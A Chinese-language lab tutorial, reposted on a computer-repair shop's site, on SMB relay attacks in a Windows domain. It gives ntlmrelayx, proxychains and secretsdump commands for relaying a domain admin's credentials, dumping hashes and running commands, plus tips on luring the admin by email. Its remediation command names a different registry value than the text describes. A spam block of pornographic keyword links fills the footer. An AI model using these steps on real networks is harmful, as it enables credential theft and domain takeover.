錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
Windows SMB請求重放攻擊分析

作者: 佚名  日期:2018-07-10 18:05:05   來源: 本站整理

前言
smb中繼或叫smb請求重放攻擊,B是一個smb服務器,A來進行認證,B將A的認證信息轉發到C上,如果A的憑證在C上認證成功就能進行下一步操作,如創建服務執行命令。如果在域中控制了某些常用服務,如:WEB OA系統、文件共享等服務則可以嘗試使用SMB中繼攻擊來引誘域管理員訪問達到獲取其他機器權限的目的。

環境
192.168.123.10 win 7  域管理員(administrator)機器
192.168.123.11 kali linux 攻擊者機器
192.168.123.100 域內普通用戶-受害者機器
攻擊演示
需要smb簽名關閉下才能進行利用,只有windows server的smb簽名是默認開啟的,像Windows 7的簽名默認關閉
可以用nmap探測smb是否關閉
nmap --script smb-security-mode.nse -p445 192.168.123.0/24 --open

下載impacket工具包
git clone https://github.com/CoreSecurity/impacket.git
192.168.123.11(攻擊者機器) 執行
ntlmrelayx.py -tf hosts.txt -socks -smb2support
hosts.txt里面的內容是要進行中繼的IP,機器越多成功率越高,我這里只有一個IP

然后讓192.168.123.10(域管理員機器) 訪問192.168.123.11(攻擊者機器)的共享,可以架設一個web服務器,html頁面里嵌入\\攻擊者地址,我這里為了方便演示就在本地寫一個html

192.168.123.10(域管理員機器)訪問共享時,提示如下說明中繼成功

[*] Authenticating against smb://192.168.123.100 as Z3R0\Administrator SUCCEED [*] SOCKS: Adding Z3R0/ADMINISTRATOR@192.168.123.100(445) to active SOCKS connection. Enjoy
然后在本地會創建一個socks4代理
在 /etc/proxychains.conf 的最后一行填入
socks4  192.168.123.11 1080
配置好socks4代理后攻擊者執行
proxychains python secretsdump.py z3r0/Administrator@192.168.123.100
這樣secretsdump.py發送出的認證數據包經過socks4代理中繼就能成功進行認證

如果不加上其他參數的話ntlmrelayx.py默認會dumphash

先看看視頻效果圖
上傳時 freebuf提示圖片超出大小限制(希望小編能處理下:) ),效果圖地址:/article/UploadPic/2018-7/2018710164730287.gif
原理分析
每一步smb請求都被192.168.123.11(攻擊者機器)轉發到了其他機器上

1. 192.168.123.10(域管理員機器)向192.168.123.11(攻擊者機器)商量smb協議版本

2. 192.168.123.11(攻擊者機器)向192.168.123.100(受害者機器)商量smb協議版本
3.192.168.123.100(受害者機器)向192.168.123.11(攻擊者機器)回答支持smb v2

4.192.168.123.11(攻擊者機器)向192.168.123.10(域管理員機器)回答支持smb v2
協商完就開始認證了

1.192.168.123.10(域管理員機器)向192.168.123.11(攻擊者機器)發出NTLMSSP_NEGOTIATE認證協商請求
2.192.168.123.11(攻擊者機器)向192.168.123.100(受害者機器)發出NTLMSSP_NEGOTIATE認證協商請求
3.192.168.123.100(受害者機器)向192.168.123.11(攻擊者機器)進行響應,響應包里含有challenge

4.同樣192.168.123.11(攻擊者機器)向192.168.123.10(域管理員機器)進行響應,響應包里含有challenge5.192.168.123.10(域管理員機器)收到challenge后用hash將challenge加密,作為NTLM Response字段發送給192.168.123.11(攻擊者機器)

6.同樣,192.168.123.11(攻擊者機器)將域管理員的認證請求也發往192.168.123.100(受害者機器)

在響應包中可以看到已經認證成功了

有了管理員權限就能為所欲為了

因為沒有目標機器密碼所以不能進行正常的smb認證,ntlmrelayx腳本的socks4代理作用就是處理本地發往192.168.123.100 (受害者機器)流量起一個中繼作用,因為已經認證過了就不用再進行認證,密碼隨便填一個就行,使用socks4代理時的smb的身份認證是域管理員。
可以通過創建服務來執行命令,當然ntlmrelayx.py也可以做到.
python ntlmrelayx.py -tf hosts.txt -c 'cmexe /c calc.exe'

當192.168.123.10(域管理員機器)再次訪問共享時,192.168.123.100(受害者機器)上可以看到calc已經運行了

總結
1.可以通過給域管理員發送郵件的方式來讓他觸發smb請求
2.當然如果域管理員觸發了smb中繼請求了也可以針對他所在那一臺機器做中繼,這樣就能執行命令抓lsass.exe進程中的明文密碼了
修復建議
將注冊表項”RequireSecuritySignature”設置為 1 可以啟用 SMB 簽名
powershell執行
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" RequireSecureNegotiate -Value 1 –Force
 



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 国产成人A人亚洲精品无码| 中文字幕精品三区无码亚洲| 成人无码精品一区二区三区| 天天看高清无码一区二区三区| 亚洲最大无码中文字幕| 人禽无码视频在线观看| 亚洲精品无码99在线观看| 久久久久无码精品国产| 日韩a级无码免费视频| 无码熟妇αⅴ人妻又粗又大 | 性虎精品无码AV导航| 在人线av无码免费高潮喷水| 中文有码vs无码人妻| 全免费a级毛片免费看无码| 无码久久精品国产亚洲Av影片| 国产日产欧洲无码视频| 无码av最新无码av专区| 国产成人年无码AV片在线观看| 亚洲精品无码久久久久久久| 免费A级毛片无码免费视| 亚洲中文字幕久久精品无码2021| 国精品无码一区二区三区在线| 无码日本精品XXXXXXXXX| 人妻丰满熟妇AV无码区乱| 日韩专区无码人妻| 日韩放荡少妇无码视频| 精品多人p群无码| 中日韩精品无码一区二区三区 | 无码久久精品国产亚洲Av影片| 18禁成年无码免费网站无遮挡| 午夜人性色福利无码视频在线观看| 无码色偷偷亚洲国内自拍| 亚洲AV成人无码久久WWW| 亚洲中文字幕久久无码| 亚洲最大无码中文字幕| 大胆日本无码裸体日本动漫| 蜜芽亚洲av无码一区二区三区| 色综合久久久无码网中文| 无码成人精品区在线观看| 亚洲精品无码专区| 成人免费无码大片A毛片抽搐|